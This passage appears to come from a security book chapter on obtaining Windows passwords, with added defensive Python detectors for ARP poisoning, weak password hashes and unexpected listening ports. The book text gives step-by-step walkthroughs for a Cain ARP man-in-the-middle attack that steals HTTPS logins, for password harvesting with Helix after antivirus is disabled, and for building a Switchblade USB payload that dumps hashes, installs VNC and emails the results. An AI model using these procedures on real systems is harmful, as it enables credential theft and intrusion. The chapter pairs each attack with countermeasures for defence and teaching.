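    traffic, so it is rated CRITICAL; other hosts are rated WARNING.
    """
    known: Dict[str, str] = {}                        # ip -> MAC currently believed
    claims: Dict[str, Set[str]] = defaultdict(set)    # mac -> ips it answered for
    alerts: List[str] = []
    for ts, ip, mac in replies:
        claims[mac].add(ip)
        prev = known.setdefault(ip, mac)
        if prev != mac:
            level = "CRITICAL" if ip == gateway else "WARNING"
            alerts.append(f"{ts} {level}: {ip} moved from {prev} to {mac}")
            known[ip] = mac  # repeated re-poisoning by the same MAC is not re-reported
    for mac, ips in claims.items():
        if len(ips) > 1:
            alerts.append(
                f"WARNING: {mac} answered for {len(ips)} addresses: {', '.join(sorted(ips))}"
            )
    return alerts


if __name__ == "__main__":
    for alert in detect_poisoning(parse_trace(TRACE), "192.168.1.1"):
        print(alert)
```

A static ARP entry for the gateway on hosts that matter, or Dynamic ARP Inspection on a managed switch, prevents the MAC change that the first alert reports rather than merely detecting it.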


The ARP pane of Cain allows users to hijack other communications, including DNS, SSH, 
HTTPS, RDP, FTPS, POP3S, IMAPS, LDAPS, and SIPS. When traffic such as HTTPS is 
hijacked, the user will be warned that the certificate is invalid. They would need to click Continue 
to be able to access the site. If the user is very security conscious, they probably will not allow 
themselves to be hijacked. However, if the user clicks Continue to this website, you may be able to 
steal their username and password and view their encrypted session in plain text. 


[Screenshot: Internet Explorer "Certificate Error: Navigation Blocked" page for https://my.champlain.edu/portal/logout: "There is a problem with this website's security certificate. The security certificate presented by this website was not issued by a trusted certificate authority. Security certificate problems may indicate an attempt to fool you or intercept any data you send to the server. We recommend that you close this webpage and do not continue to this website." Links: Click here to close this webpage; Continue to this website (not recommended); More information]


To hijack HTTPS sessions using the Cain program, perform the following steps: 


1. Be sure that the sniffer and ARP program are running. Click the Hosts tab in the lower 
left-hand corner of Cain. Click the blue plus sign and the OK button to scan all the MAC 
addresses in the local subnet. 

2. Click the ARP button in the lower left-hand corner of the screen and the ARP button at the 
top of the list in the left-hand pane. Important: To enable the blue plus sign, click in the top 
windowpane under the word "Status." Once you click into the pane, click the blue plus sign 
to start hijacking traffic. 


[Screenshot: Cain APR pane tree: APR-Cert (3), APR-DNS, APR-SSH-1 (0), APR-HTTPS (70), APR-RDP (0), APR-FTPS (0), APR-POP3S (0), APR-IMAPS (0), APR-LDAPS (0), APR-SIPS (0). Status list columns: Status, IP address, MAC address, Packets ->, <- Packets, MAC address, IP address. Callout: Click in this window and the blue plus sign will become available. Lost packets: 0%]
3. The New ARP Poison Routing screen will present you with a list of MAC addresses and 
their corresponding IP addresses. Select the gateway from the left list (usually X.X.X.1) and 
the machine you want to launch the man-in-the-middle attack against from the right, and 
click OK. 


[Screenshot: New ARP Poison Routing dialog. WARNING!!! "APR enables you to hijack IP traffic between the selected host on the left list and all selected hosts on the right list in both directions. If a selected host has routing capabilities WAN traffic will be intercepted as well. Please note that since your machine has not the same performance of a router you could cause DoS if you set APR between your Default Gateway and all other hosts on your LAN." Host lists with MAC address, IP address and Hostname columns, e.g. 001F901978E3 Wireless Broad..., 000C292688A7 2kserver.home, 000C294D6FBC bt.home, 00211E7F3FDC IP-STB1.home, 192.168.1.200 0013722F8762 CLIENT4]


4. The status window will then populate with the IP and MAC addresses of the two machines 
that Cain is getting between. 


[Screenshot: APR status pane listing the gateway (MAC 001F901978E3) and the target host (MAC 000C294D6FBC, 192.168.1.6) with packet counters; tree shows APR-SSH-1 (0), APR-HTTPS (57), APR-RDP (0), APR-FTPS (0), APR-POP3S (0), APR-LDAPS (0)]


5. For demonstration purposes, as the victim, I clicked Continue after the Internet Explorer 
security warnings appeared. In this case, I was able to steal the username and password from 
an encrypted logon session. I found the username and password I entered in the Passwords 
tab on the bottom left side of Cain under HTTP. 


[Screenshot: Cain Passwords pane, HTTP: client 192.168.1.6, username jvarsalone, URL on https://my.champlain.edu/portal/...; FTP (1), IMAP (0) in the left list]


6. You can navigate to the folder C:\Program Files\Cain\HTTPS to view all of the HTTPS 
traffic. Each session that is hijacked will have a corresponding text file created for it. I found 
the test email that I sent over HTTPS revealed in plain text. 
[Screenshot: captured session file HTTPS-2009726151333968-58062 in Notepad: request headers (Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7; Keep-Alive: 300; Connection: keep-alive; Referer: https://webmail.champlain.edu/owa/...; Cookie; Content-Type: application/x-www-form-urlencoded; Content-Length: 264; cache-control: no-cache; Pragma: no-cache) followed by the URL-encoded form body of the test email addressed to jvarsalone@champlain.edu with subject "test", readable in plain text]
You can avoid having your encrypted session hijacked by paying close attention to any certificate 
warnings you receive in your browser. If you are visiting an HTTPS website and you receive 
an error about a problem with the website's certificate, do not click "Continue to this website." 
Microsoft does not recommend that you do this for a reason. Once you click Continue in Internet 
Explorer, you are in trouble. The URL bar will become red and a certificate error message will be 
displayed in the top right side of the browser. 


[Screenshot: My.Champlain - Champlain College portal page loaded in Internet Explorer after the certificate warning was bypassed; the address bar carries the Certificate Error indicator]


A user could be hijacked in one click using Internet Explorer. Even though the browser bar 
has a certificate error, it is still possible that an unsuspecting user would click Continue once and 
ignore the certificate error message in the browser bar. I have actually worked for a company that 
forced their employees to click Continue, despite getting these certificate errors, because they had 
issues with their certificate authority. Users in a situation like that would be easy prey for a 
man-in-the-middle attack using Cain. 

Instead of exclusively using Internet Explorer, the use of the Firefox browser in a corporate or 
personal environment may be worth considering. While a user can be owned in a single click with 
IE, the Firefox browser makes a user click Continue four times before allowing them to continue 
on in their HTTPS browsing process. For this reason, you may want to consider the use of the 
Firefox browser when visiting secure sites. 


For the Firefox users of the world, a similar warning will appear, stating that a "Secure 
Connection Failed." Unless you want your personal information stolen, do not click the "add an 
exception" link (a blue link at the bottom of the page). 


[Screenshot: Firefox "Page Load Error" for https://my.champlain.edu/portal/main.html: "Secure Connection Failed. my.champlain.edu uses an invalid security certificate. The certificate is not trusted because the issuer certificate is unknown. (Error code: sec_error_unknown_issuer) This could be a problem with the server's configuration, or it could be someone trying to impersonate the server. If you have connected to this server successfully in the past, the error may be temporary, and you can try again later. Or you can add an exception."]


Even if you do click the add an exception link, there are additional steps to take with Firefox 
before your secure information will get stolen. The user will also need to click the Add Exception 
button an additional time. Smart users will choose "Get me out of here!" 


[Screenshot: the same Firefox "Secure Connection Failed" page for https://my.champlain.edu/portal/main.html after the "add an exception" link has been clicked, showing the "Get me out of here!" and "Add Exception" buttons and the warning text below]


You should not add an exception if you are using an internet connection that you do not trust 
completely or if you are not used to seeing a warning for this server. 
Even after choosing to add an exception two times, there are additional steps to take with 
Firefox before you visit an "untrusted site." The Firefox user still needs to click Get Certificate and 
then click the Confirm Security Exception button at the bottom of the screen. Notice that the warning 
says that legitimate banks, stores, and other public sites will not ask you to get a certificate and 
confirm a security exception. 


[Screenshot: Firefox Add Security Exception dialog: "You are about to override how Firefox identifies this site. Legitimate banks, stores, and other public sites will not ask you to do this." Location: https://my.champlain.edu/portal/main.html. Certificate Status: This site attempts to identify itself with invalid information. Unknown Identity: Certificate is not trusted, because it hasn't been verified by a recognized authority. Checkbox: Permanently store this exception. Button: Confirm Security Exception]


Helix 


Helix is a Live CD from E-fense that is often used by people in law enforcement. Helix allows 
users to image drives and to collect important artifacts as well as volatile data from a system. Once 
the system is turned off, the volatile data held in RAM will no longer be present. 

Recently, Helix began offering more than one version of their live CD. E-fense now has several 
pay versions of their product, including Helix Enterprise, Pro, and Response. Their prices are 
relatively low compared with those of other companies that offer similar products. Fortunately, 
they still offer a free version of their product called Helix 3. To get Helix 3, go to http://www.e-fense.com/products.php and click on the small Helix 3 link in the top right-hand corner 
of the screen. 


[Screenshot: e-fense.com/products.php in Internet Explorer: "Don't let your company data walk out the door! e-fense has options to meet your computer forensics and cyber security needs." If you need visibility of your entire network to protect against malicious behavior, policy violations and hacking, you need Helix3 Enterprise; if you need to acquire Internet History, Passwords and RAM data, you need Live Response; if you need forensic disk imaging across multiple platforms or a safe forensics platform for system previews, you need Helix3 Pro. Quick Contact Form at the right]
Once you click on the link, you will be required to provide a first and last name, email address, 
and a contact phone number. After providing the required information, a link will be sent to your 
email so that you will be able to download the Helix 3 ISO file. The link provided by E-fense is 
only good for fifteen minutes, so don't waste a lot of time. Once you download the ISO file, you 
can use ImgBurn to burn the file to CD. Open your ImgBurn application and select Write image 
file to disc. Browse to the location of the Helix2009R1.iso file on your hard disk, insert a blank 
CD and click Write. 


[Screenshot: ImgBurn, Write image file to disc. Source: D:\Helix2009R1.iso, Label Helix2009R1, File Sys ISO9660 (Bootable), Joliet, Sectors 356,881 (MODE1/2048), Size 730,892,288 bytes, Time 79:20:31 (MM:SS:FF). Destination: TEAC DV-W28EC, Current Profile CD-R, Free Space 736,960,512 bytes, Supported Write Speeds 4x, 10x, 16x, 20x, 24x. Options: Test Mode (unchecked), Verify (checked), Write Speed AUTO, Copies 1]


Helix has some very impressive incident response tools that would be useful for harvesting 
information from a person's computer. In general, "good guys" use the Helix CD to get 
information such as passwords from "bad guys." However, bad guys could potentially utilize the tool to 
extract personal information from a user's system. 

To use Helix to extract information off of a system, insert the CD, and perform the following 
steps: 


1. Disable antivirus on the machine. Some of the tools cause antivirus to fire off because the 
tools are extracting password information from the target system. The steps to disable 
antivirus can vary depending on your vendor. With Symantec Norton Antivirus, just right click 
on the shield and click the checked Enable Auto-Protect option to clear it. This will disable the 
antivirus software and the shield. 


[Screenshot: Symantec AntiVirus tray menu: Open Symantec AntiVirus...; Enable Auto-Protect (checked)]


2. When you first insert the Helix CD, you will see a Warning screen. The disclaimer basically 
explains to people doing incident response that running these tools will alter the system. 
Altering the system can include things like changing memory as well as date and time stamps 
on files and folders. Click the Accept button if you agree to the conditions. 
[Screenshot: Helix2009R1 warning screen: "You are running this application in a LIVE Windows environment. There is ABSOLUTELY NO WAY to protect this live environment from changing. This application WILL make changes to the running system. This is an accepted risk you must be willing to take. If you are not willing to accept this risk or do not understand what you are doing then exit now, otherwise agree and proceed at your own risk...." Brought to you by: http://www.e-fense.com. Choose Your Language. Buttons: Accept, Exit]


3. Click on the icon of a magnifying glass and memory chip icon to launch the incident 
response tools for Windows systems. There are actually three pages of incident response 
tools. Helix will automatically take you to page 1. 


[Screenshot: Helix Quick Launch page: Incident Response Tools for Windows Systems]


4. Page 1 of the incident response tools includes the Windows Forensic Toolchest, First 
Responder Utility, IR Collection Report, Agile Risk Management's Nigilant32, and the 
ability to start a Netcat Listener. Many of the tools on the first page do not always work 
properly or have expired licenses. The Netcat Listener tool will be examined in Chapter 3. 
[Screenshot: Helix Incident Response, page 1]


5. Click the top arrow button to reach page 2 of Helix's incident response tools. Notice that 
the number 2 is displayed in the incident response icon. The top of page 2 has an area where 
individual files can be hashed. To hash any file on the system, click the Browse button 
directly above the Hash button, select the file you wish to hash and click the Hash button. 
Other tools include a trusted Command Shell, VNC Server, PuTTY SSH, WinAudit, File 
Recovery, Rootkit Revealer, Screen Capture, and a PC On/Off Time utility. Several of these 
utilities will be examined in Chapter 3. 


[Screenshot: Helix Incident Response, page 2, with the file hashing area (Browse and Hash buttons) at the top]
6. Click the top arrow button to reach page 3 of Helix's incident response tools. The number 
3 is displayed in the incident response icon. Page 3 is where the majority of password viewing 
tools within Helix exist. The password recovery tools included with this distribution 
of Helix include viewers for PST passwords, mail passwords, network passwords, IE passwords, 
protected storage, and an asterisk logger. I suggest you run all of these tools to harvest 
as many passwords from the user's system as possible. Sometimes the IE Password Viewer 
will yield no results but several IE passwords will be found in the Protected Storage Viewer. 
While these tools do work on some systems under certain conditions, they will not always be 
able to retrieve passwords. Other useful information about the user's surfing habits can be 
retrieved by using Helix's IE history and cookie viewer, as well as the Mozilla cookie viewer 
if they have been using Firefox. 


When the user drags their mouse over any of the tools in the list, they will be provided with a 
description of what each tool does at the bottom of the screen. 




Launch any of the utilities by dragging your mouse to the icon and double clicking on it. 


The PST Password Viewer utility is useful if the user chooses to password protect their 
Outlook inbox. Users sometimes will password protect their PST files by setting a password 
on their personal folders. This is done by right clicking on Personal Folders, selecting 
Properties, and clicking Change Password. 
[Screenshot: Microsoft Outlook, Personal Folders properties: Change Password ("Changes the password used to access the personal folder file"); options Show number of unread items, Show total number of items]


While most people may think the emails within their PST file are safe from prying eyes after 
they password protect it, they are wrong. This tool from Nirsoft, http://www.nirsoft.net/, allows 
Helix users to find several passwords that will open the PST file. 

To use the PST Password Viewer: 


1. Double click on the PST Password Viewer on page 3 of Helix's incident response tools. 

2. Click Yes to the message that “you are about to run the Helix PST Password Viewer from 
Nirsoft, is this OK?" 

3. There will be three passwords that can be used to open the PST file. Any of the three pass- 
words will open the file. If you want more, right click and select Get More Passwords. One 
is really all you need to open the PST file. 


[Screenshot: PstPassword window listing the recovered passwords for the PST file, with Encryption and Compressible columns]


The Protected Storage Password Viewer may provide you with passwords and usernames that 
are stored with auto complete. 

To use the Protected Storage Password Viewer: 

1. Double click on the Protected Storage Password Viewer on page 3 of Helix's incident 
response tools. 

2. Click Yes to the message that "you are about to run the Helix Protected Storage Password 
Viewer from Nirsoft, is this OK?" 

3. Usernames and passwords such as AutoComplete Passwords and Outlook Express may be 
displayed. 
[Screenshot: Protected Storage PassView: mail.jesse1.net, Outlook Express, jesse, ISthisMYrealPASSWORD; IdentitiesPass, Outlook Express Identity, Main Identity; https://www.google.com/accounts/Login, AutoComplete Passwords, defenseblackarts; https://www.google.com/accounts/LoginAuth, AutoComplete Passwords, blackartsdefense]

To avoid getting "owned" by a hack tool that harvests passwords from auto complete forms, 
periodically clear your auto complete fields or avoid using them altogether. And, never, ever use auto 
complete when you are using a public computer, such as a hotel kiosk or a computer in a library. 
To clear your auto complete forms in Internet Explorer: 


1. Open Internet Explorer, click on Tools and select Internet Options. 

2. Click the Content tab. Click the second tab from the bottom to adjust your auto complete 
settings. 

3. Click the Delete AutoComplete History button. 


[Screenshot: Internet Options, Content tab (Parental Controls, Content Advisor, Certificates, AutoComplete with a Settings button, Feeds and Web Slices) and the AutoComplete Settings dialog: "AutoComplete lists possible matches from entries you've typed or visited before." Use AutoComplete for: Address bar (Browsing history, Favorites, Feeds, Use Windows Search for better results), Forms, User names and passwords on forms, Ask me before saving passwords; Delete AutoComplete history... button]


Switchblade 


Recently, a lot of agencies stopped allowing USB drives to be attached to their network. One of 
the reasons for this is tools like Amish and Switchblade that allow individuals to put malicious 
payloads on their USB devices. The people at Hak5 have compiled a wiki on how to include these 
malicious payloads on USB devices. More information is available at http://wiki.hak5.org/wiki//USB_Switchblade. 
This site also explains how the Sandisk USB U3 technology can be leveraged 
to exploit systems. Files that are considered to be viruses or malware cannot be deleted or 
quarantined when they exist on a U3 partition. The U3 partition is read-only and cannot be modified 
without special software. There is a program called the Universal Customizer that will allow you 
to edit and add files to the special U3 partition on Sandisk USB drives. To get this program, 
go to http://gonzor228.com/download/ and download the latest version of Switchblade and the 
Universal Customizer. Unzip both of the files. 
[Screenshot: GonZor228.com Download page in Internet Explorer, showing GonZor's Payload, Latest 
Release: V2.0 Series Stable Release, with MD5 sums listed for the downloads.] 


In order to use Switchblade and the Universal Customizer, you will need a USB drive from 
SanDisk with U3 technology. Caution: Performing these steps will alter your SanDisk U3 partition. 
To add a malicious payload to your U3 partition: 


1. Double click on the GonZors_SwitchBlade-V2.0 folder. Right click on U3CUSTOM.ISO 
and select Copy. 

2. Double click on the Universal Customizer folder. Double click on the Bin folder. Delete the 
U3CUSTOM.ISO file and paste the one from the GonZors_SwitchBlade-V2.0 folder. The 
size of the U3CUSTOM.ISO file should be 13,720 KB. 

3. Locate the Universal Customizer.exe file and double click on it. Read the agreement and 
accept it if you agree to the terms. Click Next. 


[Screenshot: U3 Customizer, Introduction step (steps listed: Introduction, Backup, Customizing, 
Complete). The maker of this application holds no responsibility for any device or software 
damages; by selecting Accept and clicking Next you are using this software at your own risk. It 
should be compatible with all U3 devices, but if it does not work with your device and damages it, 
the author is not responsible. Accept / Decline.] 


Obtaining Windows Passwords @ 79 


4. Read the important warnings and click Next at Step 2 after verifying that all U3 applica- 
tions are closed. Click Next. Do not eject during this process! 


[Screenshot: U3 Customizer, Step 2: Welcome to U3 Customizer. Follow the instructions to 
customize your U3 smart drive. IMPORTANT: (1) Close all U3 Smart applications and any 
applications that access your U3 smart drive. (2) Ejecting your U3 smart drive or shutting down 
the computer before the process is complete may damage the device. Click Next to continue; U3 
Customizer will now close all currently running U3 Smart applications.] 


5. During Step 3 your data on your U3 drive will be backed up to a zip file. Set a password on 
the file. (It will not accept a blank password.) Click Next. 


[Screenshot: U3 Customizer, Step 3 (Backup): All data on your U3 smart drive will be backed up 
to a password-protected ZIP file created by U3 Customizer. After the customization is complete, 
your data will be restored automatically. The backup file (named U3-Backup-<date>-<serial>.zip) 
will be saved to the My Documents folder.] 


6. During Step 4, the U3 drive will be formatted. Do not eject during this process. 


[Screenshot: U3 Customizer, Step 4 (Customizing), Disclaimer. WARNING: (1) Do not eject your 
U3 smart drive or shut down the computer until the customization is complete. (2) Do not run U3 
smart applications, or applications that access files on the U3 smart drive, while U3 Customizer 
is running.] 


7. Once you receive this message, your U3 partition has a nasty payload! The light on the drive 
will most likely be off. 


[Screenshot: U3 Customizer, Complete: Please remove and re-insert your U3 smart drive for the 
settings to take effect.] 


8. Never put this drive in another person's system. You may do it on your own system. I have 
heard of cases where a hacker will stick a picture of their wife or family on the thumb drive 
and load their USB drive with the payload to extract information (see Figure 2.1). This is a 
good reason you should never insert a USB drive you find in the parking lot into your system! 

Figure 2.1 A picture of a cute kid on a USB drive. 


9. Remove and reinsert the thumb drive into your system. Right click on the U3 CD and select 
Explore. Double click on the System folder. Double click on the SRC folder. Notice all of 
the files that are utilized to harvest information from a person's system. These files cannot be 
deleted or quarantined by antivirus. 


[Screenshot: Windows Explorer showing the U3 CD drive (H:) with the folders SYSTEM, SRC, HS 
and VNC and the file LAUNCHPAD.ZIP. The SRC folder (32 items) contains CACERT.PEM, 
CACHEDUMP.EXE, FGDUMP.EXE, FIREPASSWORD.EXE, GO.BAT, IEPV.EXE, IMOKAV.EXE, 
LIBEAY32.DLL, LSTARGET.DLL, MAILPV.EXE, MSPASS.EXE, NETPASS.EXE, NSPR4.DLL, 
NSS3.DLL, PLC4.DLL, PLDS4.DLL, PORTQRY.EXE, PRODUKEY.EXE, PSPV.EXE, PWDUMP.EXE, 
SEND.BAT, SOFTOKN3.DLL, SSLEAY32.DLL, VNC.REG, WGET.EXE, WIFIKE.EXE and WUL.EXE, 
among others.] 


10. To finish setting up the Switchblade program, copy the SBConfig-V2.0.18.exe file from the 
GonZors_SwitchBlade-V2.0 folder to your SanDisk U3 thumb drive. Double click on the 
SBConfig-V2.0.18.exe file on the thumb drive. Set the email address and the password for 
the email account. Click the Select All Payload Options radio button. Click the following 
two additional options: Turn U3 Launch Pad On and Turn PL On. Verify that these radio 
buttons are now set to Turn PL Off and Turn U3 Launch Pad Off. Click Update Config and Quit. 

[Screenshot: SBConfig window. Payload Options: Dump System Info, Dump External IP, VNC 
Install, HakSaw Install, Dump Wifi Hex, Dump SAM (PWDUMP), Dump SAM (FGDUMP), Dump 
Network Passwords, Dump Mail Passwords, Dump Firefox Passwords, Dump IE Passwords, Dump 
Cache, Dump LSA Secrets, Dump Product Keys, Dump URL History, Dump Updates List, Dump 
Network Services, Dump Port Scan (all checked). HakSaw Setup: Email to, Email from. External 
IP URL. Buttons: Turn PL Off, Select All Payload Options, Deselect All Payload Options, Reset 
Default Settings.] 


The tools that will be added to the U3 payload include the following: 


■ Dump system info: Lists the computer name and user logged on. 

[Screenshot: Dump system info output in ipconfig /all form: host name, node type, IP routing 
enabled, WINS proxy enabled, and for the Ethernet adapter its description (Marvell Yukon 88E8056 
PCI-E Gigabit Ethernet Controller), physical address, DHCP status, IP address, subnet mask, 
default gateway and DNS servers.] 
■ Dump external IP: Will provide the public IP address. This is needed to connect to the sys- 
tem remotely from the Internet. 

External IP dumped 
96.234.173.100 


■ HakSaw install: Installs the HakSaw program. 

[Screenshot: payload output for the wireless adapter (Realtek RTL8187 wireless 802.11b/g 54Mbps 
USB 2.0 Network Adapter) and its interface GUID.] 


■ Dump SAM (FGDUMP): Extracts usernames and their corresponding password hashes 
from the SAM file using the FGDUMP program. 

■ Dump SAM (PWDUMP): Extracts usernames and their corresponding password hashes 
from the SAM file using the PWDUMP program. 

[Screenshot: fgdump output. Banner: fizzgig and the mighty group at foofus.net; Copyright (c) 
2007 fizzgig and foofus.net; fgdump comes with ABSOLUTELY NO WARRANTY! This is free 
software, and you are welcome to redistribute it under certain conditions; see the COPYING and 
README files for more information. Then: Starting dump on 127.0.0.1; ** Beginning local dump 
**; OS (127.0.0.1): Microsoft Windows XP Professional Service Pack 2 (Build 2600); Passwords 
dumped successfully; Failed servers: NONE; Successful servers: 127.0.0.1; Total failed: 0; Total 
successful: 1; followed by one line per local account (Administrator, default, Guest, HelpAssistant 
and the IUSR, root, SQLAgentCmdExec, SUPPORT and VMware user accounts) in the form 
user:RID:LM hash:NT hash:::, with NO PASSWORD**** printed where a hash is empty.] 
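The pwdump-style lines above are the natural input for a defensive audit. The following is an added example, not code from the book or from fgdump/pwdump: it parses lines in the user:RID:LM hash:NT hash::: layout shown above, skips banner and summary text, and flags accounts with a blank password, accounts that still have an LM hash stored (the weak legacy format that the NoLMHash policy or a password longer than 14 characters suppresses), and groups of accounts sharing one NT hash (the same password on several accounts). The sample dump and its account names and hash values are constructed; only the two empty-hash constants are real, being the well-known LM and NT hashes of an empty password.

```python
from collections import defaultdict

# Well-known hashes of an empty password (standard constants, not from the book).
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"
# pwdump/fgdump print this marker (padded with asterisks) instead of an empty hash.
NO_PASSWORD = "NO PASSWORD"

# Constructed sample in pwdump layout: user:RID:LM hash:NT hash:::
# Hash values are made up; only the two empty-hash constants above are real.
SAMPLE_DUMP = """\
fgdump comes with ABSOLUTELY NO WARRANTY!
Starting dump on 127.0.0.1
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
svc_backup:1001:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
jdoe:1002:AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Total successful: 1
"""


def parse_pwdump(text):
    """Return [(user, rid, lm, nt), ...]; banner and summary lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        # A hash line has at least user, RID, LM, NT, and the RID is numeric.
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].upper(), parts[3].upper()
        records.append((user, rid, lm, nt))
    return records


def is_empty_lm(lm):
    return lm == EMPTY_LM or lm.startswith(NO_PASSWORD)


def is_empty_nt(nt):
    return nt == EMPTY_NT or nt.startswith(NO_PASSWORD)


def audit(records):
    """Flag the conditions a defender acts on.

    blank_password : NT hash empty, so the account has no password at all
    lm_hash_stored : a real LM hash is present (weak legacy format; suppressed
                     by the NoLMHash policy or by passwords over 14 characters)
    shared_password: several accounts carry the same NT hash, i.e. one password
    """
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in records:
        if is_empty_nt(nt):
            findings["blank_password"].append(user)
            continue
        if not is_empty_lm(lm):
            findings["lm_hash_stored"].append(user)
        by_nt[nt].append(user)
    for users in by_nt.values():
        if len(users) > 1:
            findings["shared_password"].append(sorted(users))
    return dict(findings)


if __name__ == "__main__":
    for kind, users in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{kind}: {users}")
```

Run on a real dump, the three finding lists are the work queue: blank passwords get set, shared passwords get rotated, and a non-empty LM column on a current system means LM hash storage has not been disabled.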


■ Dump network passwords: Dumps passwords used to connect to Windows shares, and so on. 

■ Dump mail passwords: Harvests passwords from Outlook, Outlook Express, and Windows 
Mail. 

■ Dump IE passwords: Dumps usernames and passwords from Internet Explorer. 


[Screenshot: Dump IE passwords output: for each entry the URL (https://www.google.com/accounts/ 
servicelogin, http://twitter.com), the type (Autocomplete), the storage location (Registry), the 
user name and the password.] 
■ Dump Firefox passwords: Dumps usernames and passwords from Mozilla Firefox. 

■ Dump messenger passwords: Finds usernames and passwords from messenger programs like 
Yahoo and AIM. 

■ Dump LSA secrets: Can include various usernames and passwords from the local system. 

■ Dump product keys: Obtains product keys for the operating system and software applica- 
tions like Microsoft Office and Adobe Acrobat. 

■ Dump URL history: Provides a "roadmap" of websites the user has browsed and the dates 
that those websites were visited. 




[Screenshot: Dump URL history output opened in Notepad: Pages visited in week starting 
8/31/2009, grouped by site (mail.google.com, news.google.com, www.google.com, 
www.wireless.att.com).] 


■ Dump update lists: Lists patches that have been installed to the system. Hackers want to 
know this so they know how a particular system is vulnerable. The option to uninstall the 
update from the command line is also listed if available. 


[Screenshot: Dump update lists output: one entry with the installing user (administrator), 
Installation Date (9/22/2009), Display version, Update Type (Update), Operating System 
(Windows XP), the support.microsoft.com web link and the Uninstall Command.] 


■ Dump network services: Will explain which network services are running on a particular 
box, such as FTP and HTTP. In this case, VNC is listening because it was installed by the 
payload. 

Active Connections 

  Proto  Local Address          Foreign Address        State 
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING 
 [winvnc.exe] 
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING 
 [winvnc.exe] 

[Screenshot: port-to-process mapping output: Creating log file called 
\system\Logs\CLIENT32\CLIENT32_TEMP.log; Processing local system's ports...; TCP/UDP Port to 
Process Mappings, with columns Local IP, State (TIME_WAIT, LISTENING) and Remote IP:Port for 
the local addresses shown.] 
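The netstat listing above is also what a defender looks at after an incident. Here is an added example (not from the book or from the payload's tools) that parses output in the layout shown above, where the owning process appears in brackets on the line after each socket, and reports listening sockets that are not on a known-good baseline, labelling the two VNC ports the payload opens. The sample output, the process names and the baseline are constructed for the example.

```python
import re
from dataclasses import dataclass

# One socket per line; Windows "netstat -anb" then prints the owning process in
# brackets on the following line (or "Can not obtain ownership information").
SOCKET_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?\s*$")
PROCESS_RE = re.compile(r"^\s*\[(.+?)\]\s*$")

# Constructed sample in the layout of the listing above.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
 [svchost.exe]
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  Can not obtain ownership information
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING
 [winvnc.exe]
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING
 [winvnc.exe]
  TCP    192.168.1.200:1046     203.0.113.7:443        ESTABLISHED
 [iexplore.exe]
  UDP    0.0.0.0:500            *:*
 [lsass.exe]
"""


@dataclass
class Socket:
    proto: str
    local: str
    remote: str
    state: str              # empty for UDP, which has no connection state
    process: str = "unknown"

    @property
    def port(self):
        return int(self.local.rsplit(":", 1)[1])   # rsplit also handles [::]:135

    @property
    def listening(self):
        return self.state == "LISTENING" or (self.proto == "UDP" and not self.state)


def parse_netstat(text):
    sockets = []
    for line in text.splitlines():
        m = SOCKET_RE.match(line)
        if m:
            proto, local, remote, state = m.groups()
            sockets.append(Socket(proto, local, remote, state or ""))
            continue
        m = PROCESS_RE.match(line)
        if m and sockets:
            sockets[-1].process = m.group(1)  # belongs to the socket just parsed
    return sockets


# Known-good listeners for this host, (proto, port) -> expected owner; None means
# any owner is acceptable. Constructed here; a real baseline comes from an
# inventory of the machine taken while it was known to be clean.
BASELINE = {("TCP", 135): "svchost.exe", ("TCP", 445): None, ("UDP", 500): "lsass.exe"}

# Ports used by remote-control software; VNC is what the payload installs.
REMOTE_CONTROL_PORTS = {5800: "VNC (HTTP/Java viewer)", 5900: "VNC (RFB)"}


def unexpected_listeners(sockets, baseline=BASELINE):
    """Return (proto, port, process, reason) for each listener not in the baseline."""
    alerts = []
    for s in sockets:
        if not s.listening:
            continue
        key = (s.proto, s.port)
        if key in baseline and baseline[key] in (None, s.process):
            continue
        reason = REMOTE_CONTROL_PORTS.get(s.port, "not in baseline")
        alerts.append((s.proto, s.port, s.process, reason))
    return alerts


if __name__ == "__main__":
    for alert in unexpected_listeners(parse_netstat(SAMPLE_NETSTAT)):
        print("ALERT %s/%d owned by %s: %s" % alert)
```

The baseline check is deliberately keyed on both port and owner: a VNC server that had been renamed to svchost.exe would still be caught on port 5900, and svchost.exe bound to a port it never used before is caught too.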
Countermeasures 




Programs like Switchblade and Amish are nasty and can harvest your personal information and 
extract your passwords. There are several measures that can be taken to protect your computer 
from a USB payload: 


1. Do not put any unfamiliar USB devices into your system. 

2. Keep your antivirus enabled at all times and your definitions up to date. 

3. Turn off autorun. 


To turn off the autorun feature of the Windows operating systems, perform the following steps: 


1. On a computer running Windows 2000, XP, or 2003, click on the Start button and type 
GPEDIT.MSC. On Vista, 2008, or Windows 7 click on the Pearl, go up to Start Search and 
type GPEDIT.MSC. 


[Screenshot: Run dialog: Type the name of a program, folder, document, or Internet resource, and 
Windows will open it for you. Open: GPEDIT.MSC] 


2. On a computer running Windows 2000, XP, or 2003, click on Computer Configuration, 
Administrative Templates, System, and double click the Turn off AutoPlay option. On a 
computer running Vista, 2008, or Windows 7, click on Configuration, Administrative 
Templates, Windows Components, AutoPlay Policies, and double click the Turn off AutoPlay 
option. 


[Screenshot: Local Group Policy Editor trees. Left (Windows 2000/XP/2003): Local Computer 
Policy > Computer Configuration > Software Settings, Windows Settings, Administrative Templates 
